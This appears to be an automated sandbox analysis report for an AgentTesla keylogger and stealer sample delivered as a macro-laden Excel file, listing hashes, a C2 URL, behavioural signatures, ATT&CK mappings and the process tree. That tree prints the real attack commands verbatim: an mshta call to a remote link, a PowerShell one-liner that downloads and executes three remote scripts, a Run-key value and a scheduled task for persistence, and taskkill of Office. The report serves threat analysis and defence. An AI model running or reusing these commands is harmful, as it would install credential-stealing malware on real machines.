agenttesla | 1dfd0e94efad34fc4f7c476791ee34fefd358a968fe53c5e84e2dc025be7e439

General

Target

d091532e_by_Libranalysis.xlsm
Size

60KB
MD5

d091532e65e2995b48170832e7590b4a
SHA1

b4f21809b2c0dd3ed24b5078f10645def58a0098
SHA256

1dfd0e94efad34fc4f7c476791ee34fefd358a968fe53c5e84e2dc025be7e439
SHA512

e105e9da78f6825199703f34c6ddf85ca87a80443e254ce6d6fa5e1cf3429ff7d6b96b1fb830935ff6d87378212d711a937b1fcf56c5fa13cf719fdef12791e7

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

C2

http://103.151.125.220/me/file2424/inc/4922db698ea1c2.php

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1348	1080	mshta.exe	EXCEL.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	316	2012	powershell.exe

AgentTesla Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1644-127-0x00000000004375AE-mapping.dmp	family_agenttesla
behavioral1/memory/1644-126-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral1/memory/1644-128-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral1/memory/432-133-0x00000000004375AE-mapping.dmp	family_agenttesla

Blocklisted process makes network request 18 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
7	1348	mshta.exe
9	1348	mshta.exe
11	1348	mshta.exe
13	1348	mshta.exe
15	1348	mshta.exe
16	1348	mshta.exe
18	1348	mshta.exe
20	1348	mshta.exe
24	1348	mshta.exe
25	1348	mshta.exe
26	1348	mshta.exe
27	1348	mshta.exe
29	1348	mshta.exe
30	1348	mshta.exe
32	1884	powershell.exe
34	1884	powershell.exe
35	1884	powershell.exe
36	1884	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)\|IEX\"\", 0 : window.close\")"	mshta.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1884 set thread context of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 set thread context of 432	1884	powershell.exe	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1360 schtasks.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2024 taskkill.exe
1524 taskkill.exe

pid	process
1360	schtasks.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2024	taskkill.exe
1524	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEmshta.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1080 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exeMSBuild.exeMSBuild.exe

pid process

316 powershell.exe
316 powershell.exe
1884 powershell.exe
1644 MSBuild.exe
1644 MSBuild.exe
432 MSBuild.exe
432 MSBuild.exe

pid	process
1080	EXCEL.EXE

pid	process
316	powershell.exe
316	powershell.exe
1884	powershell.exe
1644	MSBuild.exe
1644	MSBuild.exe
432	MSBuild.exe
432	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exetaskkill.exetaskkill.exepowershell.exeMSBuild.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	1644	MSBuild.exe
Token: SeDebugPrivilege	432	MSBuild.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

1080 EXCEL.EXE
1080 EXCEL.EXE
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

EXCEL.EXE

pid process

1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE

pid	process
1080	EXCEL.EXE
1080	EXCEL.EXE

pid	process
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

EXCEL.EXEmshta.execmd.exepowershell.exe

description	pid	process	target process
PID 1080 wrote to memory of 1412	1080	EXCEL.EXE	splwow64.exe
PID 1080 wrote to memory of 1412	1080	EXCEL.EXE	splwow64.exe
PID 1080 wrote to memory of 1412	1080	EXCEL.EXE	splwow64.exe
PID 1080 wrote to memory of 1412	1080	EXCEL.EXE	splwow64.exe
PID 1080 wrote to memory of 1348	1080	EXCEL.EXE	mshta.exe
PID 1080 wrote to memory of 1348	1080	EXCEL.EXE	mshta.exe
PID 1080 wrote to memory of 1348	1080	EXCEL.EXE	mshta.exe
PID 1080 wrote to memory of 1348	1080	EXCEL.EXE	mshta.exe
PID 1348 wrote to memory of 520	1348	mshta.exe	cmd.exe
PID 1348 wrote to memory of 520	1348	mshta.exe	cmd.exe
PID 1348 wrote to memory of 520	1348	mshta.exe	cmd.exe
PID 1348 wrote to memory of 520	1348	mshta.exe	cmd.exe
PID 520 wrote to memory of 1884	520	cmd.exe	powershell.exe
PID 520 wrote to memory of 1884	520	cmd.exe	powershell.exe
PID 520 wrote to memory of 1884	520	cmd.exe	powershell.exe
PID 520 wrote to memory of 1884	520	cmd.exe	powershell.exe
PID 1348 wrote to memory of 1360	1348	mshta.exe	schtasks.exe
PID 1348 wrote to memory of 1360	1348	mshta.exe	schtasks.exe
PID 1348 wrote to memory of 1360	1348	mshta.exe	schtasks.exe
PID 1348 wrote to memory of 1360	1348	mshta.exe	schtasks.exe
PID 1348 wrote to memory of 2024	1348	mshta.exe	taskkill.exe
PID 1348 wrote to memory of 2024	1348	mshta.exe	taskkill.exe
PID 1348 wrote to memory of 2024	1348	mshta.exe	taskkill.exe
PID 1348 wrote to memory of 2024	1348	mshta.exe	taskkill.exe
PID 1348 wrote to memory of 1524	1348	mshta.exe	taskkill.exe
PID 1348 wrote to memory of 1524	1348	mshta.exe	taskkill.exe
PID 1348 wrote to memory of 1524	1348	mshta.exe	taskkill.exe
PID 1348 wrote to memory of 1524	1348	mshta.exe	taskkill.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 1644	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe
PID 1884 wrote to memory of 432	1884	powershell.exe	MSBuild.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d091532e_by_Libranalysis.xlsm
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1412

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" http://www.j.mp/sdupudookokokjuiusisi
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/24-1.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/24-2.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/24-3.txt') -useB)
3⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/24-1.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/24-2.txt') -useB);i'E'x(iwr('https://ia801407.us.archive.org/33/items/file-link-120/24-3.txt') -useB)
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#cmd
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#cmd
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/24.html\"
3⤵
- Creates scheduled task(s)
PID:1360

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe ((gp HKCU:\Software).nasdnasndnad)|IEX
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

2

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
382be845632fe2118b42a13451b92a9a

SHA1
2c478bde87a82a3e621a810282e247f2245387bb

SHA256
94c828febed2ec5979e582c702179401829bc7725fc53920b52524f423f3c6ce

SHA512
d259df2e98af0fffaf43960e37e93575cfe50c6d2f0263ad996839abcd00112943cc8563304b7e1683f433e3ff289eff68c2cb2db92b51de5292f772aea03c23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_09e46175-6079-4601-8aa7-bbad1f29d815
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1337de48-de24-42a6-bbe3-0c1e5f5dc33b
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8f4a847d-a9d8-4602-8c90-c86fe9a73c35
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b68786d4-cbc2-49bf-b337-db4ffc48b97a
MD5
354b8209f647a42e2ce36d8cf326cc92

SHA1
98c3117f797df69935f8b09fc9e95accfe3d8346

SHA256
feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

SHA512
420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d1db1e15-706d-4796-8d2d-e02e0bdc3f7f
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
d812714c60b5f878f7791c197f2f3bdf

SHA1
c0c2aca170e4b7a019fdb84ae059a628667e9e8b

SHA256
b5880e7a18d6c1489000223c367770f66fda5400c03bb03bd366832fc0115cc6

SHA512
660193fcf139335b12e3fb71eee972a18eee9af8004f168eaaaeecf1476c34183809e639533791e58a31122c2fd1cff89f11592bdb144003cd11ea29700cbea0

Download Submit
memory/316-75-0x00000000025A0000-0x00000000025A1000-memory.dmp

Filesize
4KB

Download
memory/316-104-0x000000001B5D0000-0x000000001B5D1000-memory.dmp

Filesize
4KB

Download
memory/316-84-0x000000001B500000-0x000000001B501000-memory.dmp

Filesize
4KB

Download
memory/316-71-0x00000000022E0000-0x00000000022E1000-memory.dmp

Filesize
4KB

Download
memory/316-72-0x000000001AB50000-0x000000001AB51000-memory.dmp

Filesize
4KB

Download
memory/316-103-0x000000001AAC0000-0x000000001AAC1000-memory.dmp

Filesize
4KB

Download
memory/316-90-0x000000001B590000-0x000000001B591000-memory.dmp

Filesize
4KB

Download
memory/316-79-0x00000000025D0000-0x00000000025D1000-memory.dmp

Filesize
4KB

Download
memory/316-76-0x000000001AAD0000-0x000000001AAD2000-memory.dmp

Filesize
8KB

Download
memory/316-77-0x000000001AAD4000-0x000000001AAD6000-memory.dmp

Filesize
8KB

Download
memory/316-87-0x00000000026A0000-0x00000000026A1000-memory.dmp

Filesize
4KB

Download
memory/316-85-0x000000001B6F0000-0x000000001B6F1000-memory.dmp

Filesize
4KB

Download
memory/432-133-0x00000000004375AE-mapping.dmp

Download
memory/432-136-0x0000000000690000-0x0000000000691000-memory.dmp

Filesize
4KB

Download
memory/520-66-0x0000000000000000-mapping.dmp

Download
memory/1080-60-0x000000002FF81000-0x000000002FF84000-memory.dmp

Filesize
12KB

Download
memory/1080-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1080-61-0x0000000070E31000-0x0000000070E33000-memory.dmp

Filesize
8KB

Download
memory/1348-78-0x0000000006003000-0x0000000006004000-memory.dmp

Filesize
4KB

Download
memory/1348-65-0x0000000000000000-mapping.dmp

Download
memory/1360-68-0x0000000000000000-mapping.dmp

Download
memory/1412-63-0x0000000000000000-mapping.dmp

Download
memory/1412-64-0x000007FEFB631000-0x000007FEFB633000-memory.dmp

Filesize
8KB

Download
memory/1524-74-0x0000000000000000-mapping.dmp

Download
memory/1644-127-0x00000000004375AE-mapping.dmp

Download
memory/1644-130-0x0000000000690000-0x0000000000691000-memory.dmp

Filesize
4KB

Download
memory/1644-128-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1644-126-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1884-122-0x0000000006360000-0x0000000006361000-memory.dmp

Filesize
4KB

Download
memory/1884-131-0x00000000062F0000-0x00000000062F5000-memory.dmp

Filesize
20KB

Download
memory/1884-123-0x0000000006570000-0x0000000006571000-memory.dmp

Filesize
4KB

Download
memory/1884-86-0x0000000002520000-0x0000000002521000-memory.dmp

Filesize
4KB

Download
memory/1884-125-0x00000000062D0000-0x00000000062DB000-memory.dmp

Filesize
44KB

Download
memory/1884-115-0x00000000064A0000-0x00000000064A1000-memory.dmp

Filesize
4KB

Download
memory/1884-114-0x00000000061A0000-0x00000000061A1000-memory.dmp

Filesize
4KB

Download
memory/1884-109-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/1884-108-0x000000007EF20000-0x000000007EF21000-memory.dmp

Filesize
4KB

Download
memory/1884-96-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/1884-82-0x00000000048A0000-0x00000000048A1000-memory.dmp

Filesize
4KB

Download
memory/1884-83-0x00000000048A2000-0x00000000048A3000-memory.dmp

Filesize
4KB

Download
memory/1884-81-0x00000000048E0000-0x00000000048E1000-memory.dmp

Filesize
4KB

Download
memory/1884-80-0x0000000002220000-0x0000000002221000-memory.dmp

Filesize
4KB

Download
memory/1884-67-0x0000000000000000-mapping.dmp

Download
memory/1884-140-0x00000000063D0000-0x00000000063D1000-memory.dmp

Filesize
4KB

Download
memory/1884-69-0x0000000075801000-0x0000000075803000-memory.dmp

Filesize
8KB

Download
memory/2024-73-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads